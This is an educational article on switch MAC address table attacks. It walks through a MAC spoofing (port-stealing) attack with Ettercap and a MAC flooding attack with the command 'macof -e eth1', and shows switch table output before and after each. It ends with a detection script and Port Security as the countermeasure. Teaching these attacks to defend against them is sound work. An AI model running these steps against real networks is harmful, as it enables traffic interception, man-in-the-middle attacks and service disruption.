Contents

Introduction
MAC Address Table Theory
MAC Spoofing Attack
MAC Flooding Attack
Impact
  Information Exposure
  Network Performance Decrease / Service Unavailable
  Man-in-the-middle Attack
Countermeasure

Introduction

The MAC Address Table is an important component of a switch. If the MAC Address Table is attacked, network performance may decrease, information may be exposed, or a Man-in-the-middle attack may even become possible. We will use some free tools to simulate the attacks.

⛑️  Please be reminded that the aim of this article is to explain the network threats and how to eliminate the issue. Illegal activities are not encouraged⛑️

MAC Address Table Theory

A switch learns source MAC Addresses from the frames it receives and records them in the MAC Address Table continuously. From these records the switch knows which MAC Addresses are attached to which ports, so it can deliver each data frame to the correct port.

Since the MAC Address Table has no verification mechanism by default, the switch trusts the source MAC Address of every frame received on any port and puts it into the MAC Address Table. So an attacker can put a fake MAC Address in a frame and send it out to make the switch learn the fake address, and the normal operation of the switch is disrupted.

MAC Spoofing Attack

I will talk about the MAC Spoofing Attack first. The attacker puts a fake MAC Address in the data frame and sends it to the switch. The MAC Address is identical to that of another host (the victim) in the same network. After that, all frames that should be delivered to the victim are wrongly redirected to the attacker. Please see the following figures.

[Figure: Mac Address Table Attack]

In normal operation, the switch uses the MAC Address Table to record the MAC Addresses and ports of the hosts.

  • 1️⃣  PC1 wants to send a frame to PC2, so PC1 puts PC2's MAC Address (ABCD.EF00.0002) in the Destination Address of the frame and sends it to the switch
  • 2️⃣  The switch checks the MAC Address Table and finds that the destination is at Port Fa0/2
  • 3️⃣  The switch sends the frame out of Fa0/2

[Figure: Mac Address Table Attack]

When the network is under a MAC Spoofing Attack:

  • 1️⃣  The attacker puts PC2's MAC Address (ABCD.EF00.0002) in the Source Address of a frame and sends it to the switch
  • 2️⃣  The switch now thinks that ABCD.EF00.0002 is at Fa0/3 and updates its MAC Address Table
  • 3️⃣  PC1 wants to send a frame to PC2
  • 4️⃣  According to the MAC Address Table, the switch wrongly sends the frame to the attacker

Now we can use the tool Ettercap in Kali Linux to simulate the attack.

[Figure: Mac Address Table Attack]

Choose Sniff ➡️  Unified Sniffing, then choose the interface on which the attack is going to be carried out.

[Figure: Mac Address Table Attack]

Choose Hosts ➡️  Scan for hosts, then Hosts ➡️  Hosts list; all hosts attached to the network are shown.

[Figure: Mac Address Table Attack]

Before the attack, check the MAC Address Table of the switch first. The hosts are connected to Gi1/0/1 and Fa1/0/1. The attacker is connected to Fa1/0/24 and is ready to start the attack.

SW#show mac address-table dynamic 
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    0016.468f.c3c0    DYNAMIC     Gi1/0/1
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/1
   1    f01e.3412.0f4d    DYNAMIC     Fa1/0/24
Total Mac Addresses for this criterion: 5

Back in Ettercap, choose Mitm ➡️  Port Stealing to start the attack. So what has the tool done? We can check using Wireshark. The attacker sends ARP Requests to the switch continuously, but the Source Address of each frame is written as the victim's.

[Figure: Mac Address Table Attack]

Check the MAC Address Table of the switch now. The records that pointed to Gi1/0/1 and Fa1/0/1 (the victims' ports) have been updated to Fa1/0/24 (the attacker's port).

SW#show mac address-table dynamic 
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    0016.468f.c3c0    DYNAMIC     Fa1/0/24
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/24
   1    f01e.3412.0f4d    DYNAMIC     Fa1/0/24
Total Mac Addresses for this criterion: 5

Using Wireshark, we can see that all the communication between the victims is sent to the attacker.

[Figure: Mac Address Table Attack]

MAC Flooding Attack

The memory space for the MAC Address Table of a switch is limited: only several thousand entries on low-end models, up to hundreds of thousands on advanced models. If the MAC Address Table is full of fake records, the switch cannot find the destination port by checking the table. In this situation the switch uses broadcast to transmit the frames. Broadcast wastes network bandwidth, and the most serious problem is that the transmitted messages are exposed and can be captured by anyone.

To check the maximum capacity of the MAC Address Table of a switch, use show mac address-table count.

SW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count  : 3
Static  Address Count  : 0
Total Mac Addresses    : 3

Total Mac Address Space Available: 5564

We want to fill the remaining 5564 spaces, so we use macof in Kali Linux to do the flooding.

Open a Terminal and input macof -e <interface>. macof generates MAC Addresses randomly, puts them into frames and sends them out to the switch.

root@kali:~# macof --help
macof: invalid option -- '-'
Version: 2.4
Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]
             [-i interface] [-n times]
root@kali:~# macof -e eth1
e3:8b:88:3:b4:cd d8:25:98:35:61:87 0.0.0.0.9537 > 0.0.0.0.18576: S 1905213613:1905213613(0) win 512
91:33:3b:3:a0:f5 d6:11:53:f:5e:c8 0.0.0.0.8066 > 0.0.0.0.49105: S 428779274:428779274(0) win 512
c4:27:40:74:3d:11 b9:a5:d3:1d:e:bf 0.0.0.0.8772 > 0.0.0.0.42343: S 1206065071:1206065071(0) win 512
9a:d7:d9:6a:fd:ee 9b:e8:7:15:e4:1d 0.0.0.0.44381 > 0.0.0.0.7072: S 352131538:352131538(0) win 512
42:33:77:69:9b:65 ef:3b:4c:19:e2:bd 0.0.0.0.24920 > 0.0.0.0.19837: S 1039619585:1039619585(0) win 512
a:60:b2:3d:fc:af d3:7c:5b:36:4a:61 0.0.0.0.17578 > 0.0.0.0.4432: S 727135709:727135709(0) win 512
18:75:26:4c:a8:23 10:81:2a:12:e1:be 0.0.0.0.42271 > 0.0.0.0.61161: S 1071867223:1071867223(0) win 512
98:15:eb:38:f3:c1 c8:d7:c1:61:be:a3 0.0.0.0.30693 > 0.0.0.0.57646: S 1759104040:1759104040(0) win 512
dc:6d:43:15:be:52 99:19:41:22:4e:36 0.0.0.0.29211 > 0.0.0.0.63665: S 481173385:481173385(0) win 512
42:d5:ac:47:75:fd 2:3c:f5:3a:29:b0 0.0.0.0.14787 > 0.0.0.0.57718: S 1888990933:1888990933(0) win 512
4d:ed:18:48:f0:f5 4b:ba:a5:66:ef:ee 0.0.0.0.54900 > 0.0.0.0.37268: S 397896255:397896255(0) win 512

<--Output Omitted-->

The switch trusts all these MAC Addresses and puts them into the MAC Address Table.

SW#show mac address-table       
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    0008.3714.23ca    DYNAMIC     Fa1/0/23
   1    000a.b745.4d74    DYNAMIC     Fa1/0/23
   1    000e.8528.b694    DYNAMIC     Fa1/0/23
   1    0010.60dd.4d6a    DYNAMIC     Fa1/0/23
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    001a.8b7b.69ad    DYNAMIC     Fa1/0/23
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/1
   1    0026.0c02.85ab    DYNAMIC     Fa1/0/23
   1    0027.ab5e.0c9f    DYNAMIC     Fa1/0/23
   1    002b.9f19.7c59    DYNAMIC     Fa1/0/23
   1    0033.7a1b.27a6    DYNAMIC     Fa1/0/23
   1    0040.145f.9b17    DYNAMIC     Fa1/0/23
   1    005f.9b5c.ffa7    DYNAMIC     Fa1/0/23
   1    0061.eb6f.174d    DYNAMIC     Fa1/0/23
   1    0075.a023.e467    DYNAMIC     Fa1/0/23
   1    0076.7375.dc6d    DYNAMIC     Fa1/0/23
   1    007a.470f.f51a    DYNAMIC     Fa1/0/23
   1    007d.b144.c298    DYNAMIC     Fa1/0/23
   1    0087.7941.3cd3    DYNAMIC     Fa1/0/23

<--Output Omitted-->

After a few seconds, the MAC Address Table is full.

SW#show mac address-table count 

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count  : 6024
Static  Address Count  : 0
Total Mac Addresses    : 6024

Total Mac Address Space Available: 0

Keep the attack running for more than 5 minutes and the old records (the real ones) will be deleted, since the timeout of the MAC Address Table is 5 minutes by default. The MAC Address Table will be filled with fake records and the real entries cannot be saved. Thus the switch sends the frames by broadcast.

Now the broadcast frames can be captured by Wireshark.

[Figure: Mac Address Table Attack]
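As an added example (my own code, not part of the original article or the tools it uses), the script below shows how a defender can spot both attacks from plain "show mac address-table dynamic" output: a MAC Address whose learned port changes between two snapshots (the port-stealing effect shown in the two tables in the MAC Spoofing section), and a port that carries more dynamic MAC Addresses than a single host should (the flooding effect shown above). The two snapshots are constructed from the tables printed earlier; the per-port limit of 2 is an assumption for a typical access port.

```python
import re
from collections import Counter
# Constructed sample input: the two "show mac address-table dynamic" outputs
# shown above, captured before and after the port-stealing attack on Fa1/0/24.
BEFORE = """\
Vlan    Mac Address       Type        Ports
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    0016.468f.c3c0    DYNAMIC     Gi1/0/1
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/1
   1    f01e.3412.0f4d    DYNAMIC     Fa1/0/24
Total Mac Addresses for this criterion: 5
"""
AFTER = """\
   1    0016.468f.c381    DYNAMIC     Gi1/0/2
   1    0016.468f.c382    DYNAMIC     Gi1/0/1
   1    0016.468f.c3c0    DYNAMIC     Fa1/0/24
   1    001e.7a37.c8e5    DYNAMIC     Fa1/0/24
   1    f01e.3412.0f4d    DYNAMIC     Fa1/0/24
"""

# One table row: vlan, dotted-hex MAC, type, port. Header and "Total" lines do not match.
ENTRY = re.compile(r"^\s*(\d+)\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+\w+\s+(\S+)\s*$", re.I)

def parse_table(text):
    """Return {(vlan, mac): port} for every entry row of the CLI output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            vlan, mac, port = m.groups()
            table[(int(vlan), mac.lower())] = port
    return table

def mac_moves(before, after):
    """MACs whose learned port changed between snapshots: (vlan, mac, old, new)."""
    return [(v, m, before[(v, m)], p) for (v, m), p in after.items()
            if (v, m) in before and before[(v, m)] != p]

def crowded_ports(table, max_per_port):
    """Ports carrying more dynamic MACs than one host's access port should (flooding sign)."""
    counts = Counter(table.values())
    return {port: n for port, n in counts.items() if n > max_per_port}

if __name__ == "__main__":
    before, after = parse_table(BEFORE), parse_table(AFTER)
    for v, m, old, new in mac_moves(before, after):
        print(f"ALERT vlan {v}: {m} moved from {old} to {new}")
    print("ports over limit:", crowded_ports(after, 2))
```

Run against periodic snapshots (for example from a scheduled "show mac address-table dynamic" capture), the MAC-move alert fires for the two victim addresses that jumped to Fa1/0/24, and the per-port count flags the same port once it carries more addresses than the limit.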

Impact

There are 3 impacts of a MAC Address Table attack:

Information Exposure

Attackers interfere with the normal operation of a switch so that they can receive the communication between the victims. If the messages are not encrypted, the information is exposed. Even if the messages are encrypted, the attacker can gather users' information and habits, such as the websites they visit, and may perform other attacks through Social Engineering.

Network Performance Decrease / Service Unavailable

Network performance decreases because of the broadcast traffic. Some switches may even halt because they cannot handle a large number of MAC Address records.

Man-in-the-middle Attack

If the attacker spoofs the Default Gateway of the network, they can perform a Man-in-the-middle Attack to capture or modify all messages passed to other networks or the Internet.

[Figure: Mac Address Table Attack]

Countermeasure

Port Security, which limits the MAC Addresses allowed on each port, can be used to eliminate MAC Address Table attacks. Please check Port Security for details.